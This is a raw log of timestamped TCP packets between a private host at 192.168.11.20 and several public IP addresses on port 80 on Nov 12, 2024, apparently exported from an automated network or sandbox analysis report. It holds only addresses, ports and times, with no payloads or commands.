                                                                                                                            Nov 12, 2024 15:31:09.611289978 CET4973880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:09.790842056 CET8049738203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:09.790973902 CET4973880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:09.799015045 CET4973880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:09.799062014 CET4973880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:09.799108028 CET4973880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:09.997020960 CET8049738203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:09.997030020 CET8049738203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:09.997242928 CET8049738203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:09.997251987 CET8049738203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:10.014020920 CET8049738203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:10.014067888 CET8049738203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:10.014313936 CET4973880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:11.311958075 CET4973880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:12.329544067 CET4973980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:12.496891022 CET8049739203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:12.497076035 CET4973980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:12.503294945 CET4973980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:12.674274921 CET8049739203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:12.685394049 CET8049739203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:12.685447931 CET8049739203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:12.685755014 CET4973980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:12.687741041 CET4973980192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:12.855796099 CET8049739203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:17.873298883 CET4974080192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:18.009087086 CET804974013.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:18.009334087 CET4974080192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:18.017143011 CET4974080192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:18.151635885 CET804974013.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:18.151952028 CET804974013.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:18.152173996 CET4974080192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:19.529006958 CET4974080192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:19.663635015 CET804974013.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:20.546391010 CET4974180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:20.683064938 CET804974113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:20.683335066 CET4974180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:20.691129923 CET4974180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:20.824493885 CET804974113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:20.831504107 CET804974113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:20.831629038 CET4974180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:22.200234890 CET4974180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:22.333651066 CET804974113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:23.217694998 CET4974280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:23.352956057 CET804974213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:23.353153944 CET4974280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:23.361154079 CET4974280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:23.361177921 CET4974280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:23.361257076 CET4974280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:23.498402119 CET804974213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:23.498410940 CET804974213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:23.498497009 CET804974213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:23.498823881 CET804974213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:25.891676903 CET4974380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:26.027745962 CET804974313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:26.027981997 CET4974380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:26.033469915 CET4974380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:26.168313026 CET804974313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:26.173508883 CET804974313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:26.173526049 CET804974313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:26.173799992 CET4974380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:26.175796986 CET4974380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:31:26.310221910 CET804974313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:31.382127047 CET4974480192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:31.515753031 CET8049744173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:31.515978098 CET4974480192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:31.523771048 CET4974480192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:31.657979012 CET8049744173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:31.657994032 CET8049744173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:31.658238888 CET4974480192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:33.026015043 CET4974480192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:34.045003891 CET4974580192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:34.179310083 CET8049745173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:34.179487944 CET4974580192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:34.188080072 CET4974580192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:34.322832108 CET8049745173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:34.322921038 CET8049745173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:34.323146105 CET4974580192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:35.697464943 CET4974580192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:36.714724064 CET4974680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:36.848507881 CET8049746173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:36.848706007 CET4974680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:36.856694937 CET4974680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:36.856755018 CET4974680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:36.990484953 CET8049746173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:36.990626097 CET8049746173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:36.990751028 CET8049746173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:36.990870953 CET8049746173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:36.991569042 CET8049746173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:36.991578102 CET8049746173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:36.991794109 CET4974680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:38.368683100 CET4974680192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:39.386096954 CET4974780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:39.519701958 CET8049747173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:39.519939899 CET4974780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:39.525569916 CET4974780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:39.659780025 CET8049747173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:39.659796953 CET8049747173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:39.660092115 CET4974780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:39.662143946 CET4974780192.168.11.20173.255.194.134
                                                                                                                            Nov 12, 2024 15:31:39.795640945 CET8049747173.255.194.134192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:44.851588011 CET4974880192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:44.968805075 CET80497483.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:44.969100952 CET4974880192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:44.980554104 CET4974880192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:45.097878933 CET80497483.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:45.115371943 CET80497483.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:45.115547895 CET4974880192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:46.491899014 CET4974880192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:46.609117031 CET80497483.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:47.509674072 CET4974980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:47.626981020 CET80497493.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:47.627214909 CET4974980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:47.635078907 CET4974980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:47.752485991 CET80497493.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:47.770734072 CET80497493.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:47.770946980 CET4974980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:49.147545099 CET4974980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:49.264831066 CET80497493.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:50.164963961 CET4975080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:50.282229900 CET80497503.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:50.282510042 CET4975080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:50.291676044 CET4975080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:50.291800976 CET4975080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:50.408936024 CET80497503.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:50.409025908 CET80497503.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:50.409140110 CET80497503.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:50.409147978 CET80497503.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:50.409153938 CET80497503.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:50.409161091 CET80497503.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:50.409168959 CET80497503.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:50.428673983 CET80497503.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:50.428894043 CET4975080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:51.803164005 CET4975080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:51.920324087 CET80497503.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:52.820776939 CET4975180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:52.938133001 CET80497513.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:52.938355923 CET4975180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:52.944065094 CET4975180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:53.061264038 CET80497513.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:53.081094980 CET80497513.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:53.081199884 CET80497513.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:53.081396103 CET4975180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:53.083463907 CET4975180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:53.086302996 CET80497513.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:53.086479902 CET4975180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:31:53.200721979 CET80497513.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:58.307534933 CET4975280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:31:58.548492908 CET804975284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:58.548773050 CET4975280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:31:58.556596041 CET4975280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:31:58.797552109 CET804975284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:58.798129082 CET804975284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:01.084486008 CET4975380192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:01.321631908 CET804975384.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:01.321984053 CET4975380192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:01.329886913 CET4975380192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:01.567589045 CET804975384.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:01.567634106 CET804975384.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:03.849653959 CET4975480192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:04.085059881 CET804975484.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:04.085212946 CET4975480192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:04.094104052 CET4975480192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:04.094151974 CET4975480192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:04.094202042 CET4975480192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:04.094371080 CET4975480192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:04.329722881 CET804975484.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:04.329732895 CET804975484.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:04.330832958 CET804975484.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:06.614501953 CET4975580192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:06.854383945 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:06.854562044 CET4975580192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:06.859771013 CET4975580192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:07.099710941 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:07.100400925 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:07.100459099 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:07.100505114 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:07.100550890 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:07.100594044 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:07.100739956 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:07.100749016 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:07.100750923 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:07.100819111 CET4975580192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:07.100819111 CET4975580192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:07.100917101 CET4975580192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:07.100917101 CET4975580192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:07.104223013 CET4975580192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:32:07.345578909 CET804975584.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:12.275041103 CET4975680192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:12.392849922 CET8049756108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:12.393132925 CET4975680192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:12.400964022 CET4975680192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:12.518781900 CET8049756108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:12.533979893 CET8049756108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:12.534029007 CET8049756108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:12.534224987 CET4975680192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:13.907749891 CET4975680192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:14.927001953 CET4975780192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:15.044907093 CET8049757108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:15.045387983 CET4975780192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:15.058449984 CET4975780192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:15.176103115 CET8049757108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:15.183222055 CET8049757108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:15.183269024 CET8049757108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:15.183506012 CET4975780192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:16.563415051 CET4975780192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:17.581098080 CET4975880192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:17.698581934 CET8049758108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:17.698844910 CET4975880192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:17.714005947 CET4975880192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:17.714052916 CET4975880192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:17.714103937 CET4975880192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:17.831698895 CET8049758108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:17.840478897 CET8049758108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:17.840565920 CET8049758108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:17.840744972 CET4975880192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:19.219053984 CET4975880192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:20.236488104 CET4975980192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:20.353976965 CET8049759108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:20.354243994 CET4975980192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:20.360177040 CET4975980192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:20.477679968 CET8049759108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:20.485378981 CET8049759108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:20.485502005 CET8049759108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:20.485512018 CET8049759108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:20.485518932 CET8049759108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:20.485752106 CET4975980192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:20.487824917 CET4975980192.168.11.20108.179.252.152
                                                                                                                            Nov 12, 2024 15:32:20.605221987 CET8049759108.179.252.152192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:25.697190046 CET4976080192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:25.831821918 CET804976013.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:25.832052946 CET4976080192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:25.839689970 CET4976080192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:25.973222971 CET804976013.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:25.973896980 CET804976013.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:25.974014997 CET4976080192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:27.342318058 CET4976080192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:27.476453066 CET804976013.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:28.359733105 CET4976180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:28.503223896 CET804976113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:28.503458023 CET4976180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:28.511244059 CET4976180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:28.652784109 CET804976113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:28.652793884 CET804976113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:28.652936935 CET4976180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:30.013673067 CET4976180192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:30.150269985 CET804976113.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:31.031001091 CET4976280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:31.169123888 CET804976213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:31.169401884 CET4976280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:31.178062916 CET4976280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:31.178126097 CET4976280192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:31.314344883 CET804976213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:31.314811945 CET804976213.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:33.702620983 CET4976380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:33.836458921 CET804976313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:33.836633921 CET4976380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:33.841876984 CET4976380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:33.974812031 CET804976313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:33.976891994 CET804976313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:33.976902008 CET804976313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:33.977186918 CET4976380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:33.979234934 CET4976380192.168.11.2013.248.169.48
                                                                                                                            Nov 12, 2024 15:32:34.112308979 CET804976313.248.169.48192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:39.215852976 CET4976480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:39.351013899 CET8049764199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:39.351191044 CET4976480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:39.359334946 CET4976480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:39.496306896 CET8049764199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:39.496356964 CET8049764199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:39.496390104 CET8049764199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:39.496464014 CET4976480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:39.496524096 CET4976480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:40.871543884 CET4976480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:41.887994051 CET4976580192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:42.028067112 CET8049765199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:42.028251886 CET4976580192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:42.036447048 CET4976580192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:42.173759937 CET8049765199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:42.173819065 CET8049765199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:42.173854113 CET8049765199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:42.174010992 CET4976580192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:43.541934013 CET4976580192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:44.559566021 CET4976680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:44.680099010 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.680279970 CET4976680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:44.689193010 CET4976680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:44.689294100 CET4976680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:44.806694984 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.806770086 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.806819916 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.806864977 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.806890011 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.806912899 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.806936979 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.824861050 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.824929953 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.824968100 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.825125933 CET4976680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:44.829380035 CET8049766199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:44.829540968 CET4976680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:46.197506905 CET4976680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:47.214994907 CET4976780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:47.350347996 CET8049767199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:47.350596905 CET4976780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:47.355833054 CET4976780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:47.490995884 CET8049767199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:47.491017103 CET8049767199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:47.491029978 CET8049767199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:47.491318941 CET4976780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:47.493159056 CET4976780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:32:47.627415895 CET8049767199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:52.709386110 CET4976880192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:52.826500893 CET80497683.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:52.826649904 CET4976880192.168.11.203.33.130.190
